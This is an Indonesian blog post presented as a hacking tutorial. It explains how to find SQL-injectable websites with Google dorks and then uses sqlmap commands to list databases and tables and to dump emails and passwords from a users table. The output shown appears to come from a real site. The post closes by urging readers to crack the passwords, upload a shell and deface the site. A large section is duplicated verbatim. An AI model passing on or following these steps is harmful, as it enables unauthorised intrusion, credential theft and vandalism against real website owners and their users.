Haloo gan , kali ini saya akan share tutorial hacking yaitu Cara sql injection menggunakan sqlmap untuk hack website, xD .
langsung saja ke tutorialnya, pertama siapkan toolsnya dulu bisa kalian cari digoogle yaitu sqlmap dan python kalo di windows, btw saya pake os backbox jadi ga install python sama sqlmap sudah ada langsung osnya.
cari website yang vuln terhadap sqli, bisa kalian cari dengan dork ini.
inurl:index.php?id=
inurl:cat.php?id=
dan kembangin lagi ya :v
saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di mbah google dengan dork diatas.
buka cmd dan ketikan sqlmap btw w pake os backbox jadi langsung ketik aja sqlmap kalo pake windows harus ke dir sqlmap dulu
setelah itu masukan perintah : sqlmap -u http://targetmu.com/index.php?id=12 --dbs
maka hasilnya akan seperti gambar dibawah ini
jika muncul
"GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter
setelah itu kita telah mendapatkan nama databasenya yaitu :
available databases [3]:
[*] information_schema
[*] ntlsinsg_db
[*] ntlsinsg_testsetelah itu kita bongkar isi databasenya yang ke 2 yaitu ntlsinsg_db lalu kita masukan perintah sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db --tables
bingung liat gambar dibawah ini
maka hasilnya seperti dibawh ini
inurl:index.php?id=
inurl:cat.php?id=
dan kembangin lagi ya :v
saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di mbah google dengan dork diatas.
buka cmd dan ketikan sqlmap btw w pake os backbox jadi langsung ketik aja sqlmap kalo pake windows harus ke dir sqlmap dulu
setelah itu masukan perintah : sqlmap -u http://targetmu.com/index.php?id=12 --dbs
maka hasilnya akan seperti gambar dibawah ini
jika muncul
"GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y lalu enter
setelah itu kita telah mendapatkan nama databasenya yaitu :
available databases [3]:
[*] information_schema
[*] ntlsinsg_db
[*] ntlsinsg_testsetelah itu kita bongkar isi databasenya yang ke 2 yaitu ntlsinsg_db lalu kita masukan perintah sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db --tables
bingung liat gambar dibawah ini
maka hasilnya seperti dibawh ini
nah sekaran keluarkan tabelnya
Database: ntlsinsg_db
[13 tables]
+---------------+
| ab_policy |
| bra_countries |
| branches |
| customer |
| news |
| news_file |
| sch_about_us |
| sch_areas |
| sch_countries |
| sch_new |
| sch_ports |
| sch_services |
| users |
+---------------+
sekarang kita lihat user adminnya kira kira ada di tabel mana mungkin di tabel users mari kita check
dengan perintah
sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db -T users --columns
maka hasilnya akan seperti ini
nah sekarang tahap terakhir yaitu dump dengan perintah seperti ini
sqlmap -u http://tagetmu.com/index.php?id=12 -D ntlsinsg_db -T users -C email,password --dump
maka hasilnya akan seperti ini
dan taraaaaaaaa akhirnya dapat username dan passwordnya sekarang lu crack passwordnya setelah crack tinggal cari halaman adminnya dan upload shell terus deface :v
mungkin sekian dulu dari saya mengenai artikel Cara sql injection menggunakan sqlmap semoga bermanfaat
EmoticonEmoticon